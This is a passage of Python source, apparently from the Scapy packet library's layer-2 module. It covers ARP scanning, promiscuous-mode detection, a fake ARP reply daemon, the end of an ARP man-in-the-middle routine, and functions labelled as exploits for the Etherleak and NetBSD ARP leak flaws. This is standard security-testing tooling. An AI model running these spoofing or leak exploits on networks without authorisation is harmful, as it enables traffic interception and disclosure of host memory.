979 for ipa, _ in tup1
980 if ipb != ipa
981 for x in
982 Ether(dst=macb, src=target_mac) /
983 ARP(op="who-has", psrc=ipa, pdst=ipb,
984 hwsrc=target_mac, hwdst="00:00:00:00:00:00")
985 ),
986 )),
987 filter="arp and arp[7] = 2",
988 inter=inter,
989 iface=iface,
990 timeout=0.5,
991 verbose=1,
992 store=0,
993 )
994 print("Restoring...")
995 sendp(
996 list(itertools.chain(
997 (x
998 for ipa, maca in tup1
999 for ipb, macb in tup2
1000 if ipb != ipa
1001 for x in
1002 Ether(dst="ff:ff:ff:ff:ff:ff", src=macb) /
1003 ARP(op="who-has", psrc=ipb, pdst=ipa,
1004 hwsrc=macb, hwdst="00:00:00:00:00:00")
1005 ),
1006 (x
1007 for ipb, macb in tup2
1008 for ipa, maca in tup1
1009 if ipb != ipa
1010 for x in
1011 Ether(dst="ff:ff:ff:ff:ff:ff", src=maca) /
1012 ARP(op="who-has", psrc=ipa, pdst=ipb,
1013 hwsrc=maca, hwdst="00:00:00:00:00:00")
1014 ),
1015 )),
1016 iface=iface
1017 )
1020class ARPingResult(SndRcvList):
1021 def __init__(self,
1022 res=None, # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]] # noqa: E501
1023 name="ARPing", # type: str
1024 stats=None # type: Optional[List[Type[Packet]]]
1025 ):
1026 SndRcvList.__init__(self, res, name, stats)
1028 def show(self, *args, **kwargs):
1029 # type: (*Any, **Any) -> None
1030 """
1031 Print the list of discovered MAC addresses.
1032 """
1033 data = list() # type: List[Tuple[str | List[str], ...]]
1035 for s, r in self.res:
1036 manuf = conf.manufdb._get_short_manuf(r.src)
1037 manuf = "unknown" if manuf == r.src else manuf
1038 data.append((r[Ether].src, manuf, r[ARP].psrc))
1040 print(
1041 pretty_list(
1042 data,
1043 [("src", "manuf", "psrc")],
1044 sortBy=2,
1045 )
1046 )
1049@conf.commands.register
1050def arping(net: str,
1051 timeout: int = 2,
1052 cache: int = 0,
1053 verbose: Optional[int] = None,
1054 threaded: bool = True,
1055 **kargs: Any,
1056 ) -> Tuple[ARPingResult, PacketList]:
1057 """
1058 Send ARP who-has requests to determine which hosts are up::
1060 arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb]) -> None
1062 Set cache=True if you want arping to modify internal ARP-Cache
1063 """
1064 if verbose is None:
1065 verbose = conf.verb
1067 hwaddr = None
1068 if "iface" in kargs:
1069 hwaddr = get_if_hwaddr(kargs["iface"])
1070 if isinstance(net, list):
1071 hint = net[0]
1072 else:
1073 hint = str(net)
1074 psrc = conf.route.route(hint, verbose=False)[1]
1075 if psrc == "0.0.0.0":
1076 if "iface" in kargs:
1077 psrc = get_if_addr(kargs["iface"])
1078 else:
1079 warning(
1080 "No route found for IPv4 destination %s. "
1081 "Using conf.iface. Please provide an 'iface' !" % hint)
1082 psrc = get_if_addr(conf.iface)
1083 hwaddr = get_if_hwaddr(conf.iface)
1084 kargs["iface"] = conf.iface
1086 ans, unans = srp(
1087 Ether(dst="ff:ff:ff:ff:ff:ff", src=hwaddr) / ARP(
1088 pdst=net,
1089 psrc=psrc,
1090 hwsrc=hwaddr
1091 ),
1092 verbose=verbose,
1093 filter="arp and arp[7] = 2",
1094 timeout=timeout,
1095 threaded=threaded,
1096 iface_hint=hint,
1097 **kargs,
1098 )
1099 ans = ARPingResult(ans.res)
1101 if cache and ans is not None:
1102 for pair in ans:
1103 _arp_cache[pair[1].psrc] = pair[1].hwsrc
1104 if ans is not None and verbose:
1105 ans.show()
1106 return ans, unans
1109@conf.commands.register
1110def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00", **kargs):
1111 # type: (str, str, **Any) -> bool
1112 """Try to guess if target is in Promisc mode. The target is provided by its ip.""" # noqa: E501
1114 responses = srp1(Ether(dst=fake_bcast) / ARP(op="who-has", pdst=ip), type=ETH_P_ARP, iface_hint=ip, timeout=1, verbose=0, **kargs) # noqa: E501
1116 return responses is not None
1119@conf.commands.register
1120def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs):
1121 # type: (str, int, str, **Any) -> Tuple[ARPingResult, PacketList]
1122 """Send ARP who-has requests to determine which hosts are in promiscuous mode
1123 promiscping(net, iface=conf.iface)"""
1124 ans, unans = srp(Ether(dst=fake_bcast) / ARP(pdst=net),
1125 filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, **kargs) # noqa: E501
1126 ans = ARPingResult(ans.res, name="PROMISCPing")
1128 ans.show()
1129 return ans, unans
1132class ARP_am(AnsweringMachine[Packet]):
1133 """Fake ARP Relay Daemon (farpd)
1135 example:
1136 To respond to an ARP request for 192.168.100 replying on the
1137 ingress interface::
1139 farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05')
1141 To respond on a different interface add the interface parameter::
1143 farpd(IP_addr='192.168.1.100',ARP_addr='00:01:02:03:04:05',iface='eth0')
1145 To respond on ANY arp request on an interface with mac address ARP_addr::
1147 farpd(ARP_addr='00:01:02:03:04:05',iface='eth1')
1149 To respond on ANY arp request with my mac addr on the given interface::
1151 farpd(iface='eth1')
1153 Optional Args::
1155 inter=<n> Interval in seconds between ARP replies being sent
1157 """
1159 function_name = "farpd"
1160 filter = "arp"
1161 send_function = staticmethod(sendp)
1163 def parse_options(self, IP_addr=None, ARP_addr=None, from_ip=None):
1164 # type: (Optional[str], Optional[str], Optional[str]) -> None
1165 if isinstance(IP_addr, str):
1166 self.IP_addr = Net(IP_addr) # type: Optional[Net]
1167 else:
1168 self.IP_addr = IP_addr
1169 if isinstance(from_ip, str):
1170 self.from_ip = Net(from_ip) # type: Optional[Net]
1171 else:
1172 self.from_ip = from_ip
1173 self.ARP_addr = ARP_addr
1175 def is_request(self, req):
1176 # type: (Packet) -> bool
1177 if not req.haslayer(ARP):
1178 return False
1179 arp = req[ARP]
1180 return (
1181 arp.op == 1 and
1182 (self.IP_addr is None or arp.pdst in self.IP_addr) and
1183 (self.from_ip is None or arp.psrc in self.from_ip)
1184 )
1186 def make_reply(self, req):
1187 # type: (Packet) -> Packet
1188 ether = req[Ether]
1189 arp = req[ARP]
1191 if 'iface' in self.optsend:
1192 iff = cast(Union[NetworkInterface, str], self.optsend.get('iface'))
1193 else:
1194 iff, a, gw = conf.route.route(arp.psrc)
1195 self.iff = iff
1196 if self.ARP_addr is None:
1197 try:
1198 ARP_addr = get_if_hwaddr(iff)
1199 except Exception:
1200 ARP_addr = "00:00:00:00:00:00"
1201 else:
1202 ARP_addr = self.ARP_addr
1203 resp = Ether(dst=ether.src,
1204 src=ARP_addr) / ARP(op="is-at",
1205 hwsrc=ARP_addr,
1206 psrc=arp.pdst,
1207 hwdst=arp.hwsrc,
1208 pdst=arp.psrc)
1209 return resp
1211 def send_reply(self, reply, send_function=None):
1212 # type: (Packet, Any) -> None
1213 if 'iface' in self.optsend:
1214 self.send_function(reply, **self.optsend)
1215 else:
1216 self.send_function(reply, iface=self.iff, **self.optsend)
1218 def print_reply(self, req, reply):
1219 # type: (Packet, Packet) -> None
1220 print("%s ==> %s on %s" % (req.summary(), reply.summary(), self.iff))
1223@conf.commands.register
1224def etherleak(target, **kargs):
1225 # type: (str, **Any) -> Tuple[SndRcvList, PacketList]
1226 """Exploit Etherleak flaw"""
1227 return srp(Ether() / ARP(pdst=target),
1228 prn=lambda s_r: conf.padding_layer in s_r[1] and hexstr(s_r[1][conf.padding_layer].load), # noqa: E501
1229 filter="arp", **kargs)
1232@conf.commands.register
1233def arpleak(target, plen=255, hwlen=255, **kargs):
1234 # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList]
1235 """Exploit ARP leak flaws, like NetBSD-SA2017-002.
1237https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc
1239 """
1240 # We want explicit packets
1241 pkts_iface = {} # type: Dict[str, List[Packet]]
1242 for pkt in ARP(pdst=target):
1243 # We have to do some of Scapy's work since we mess with
1244 # important values
1245 iface = conf.route.route(pkt.pdst)[0]
1246 psrc = get_if_addr(iface)
1247 hwsrc = get_if_hwaddr(iface)
1248 pkt.plen = plen
1249 pkt.hwlen = hwlen
1250 if plen == 4:
1251 pkt.psrc = psrc
1252 else:
1253 pkt.psrc = inet_aton(psrc)[:plen]
1254 pkt.pdst = inet_aton(pkt.pdst)[:plen]
1255 if hwlen == 6:
1256 pkt.hwsrc = hwsrc
1257 else:
1258 pkt.hwsrc = mac2str(hwsrc)[:hwlen]
1259 pkts_iface.setdefault(iface, []).append(
1260 Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt
1261 )
1262 ans, unans = SndRcvList(), PacketList(name="Unanswered")
1263 for iface, pkts in pkts_iface.items():
1264 ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs)
1265 ans += ans_new
1266 unans += unans_new
1267 ans.listname = "Results"
1268 unans.listname = "Unanswered"
1269 for _, rcv in ans:
1270 if ARP not in rcv:
1271 continue
1272 rcv = rcv[ARP]
1273 psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc)
1274 if plen > 4 and len(psrc) > 4:
1275 print("psrc")
1276 hexdump(psrc[4:])
1277 print()
1278 hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc)
1279 if hwlen > 6 and len(hwsrc) > 6:
1280 print("hwsrc")
1281 hexdump(hwsrc[6:])
1282 print()
1283 return ans, unans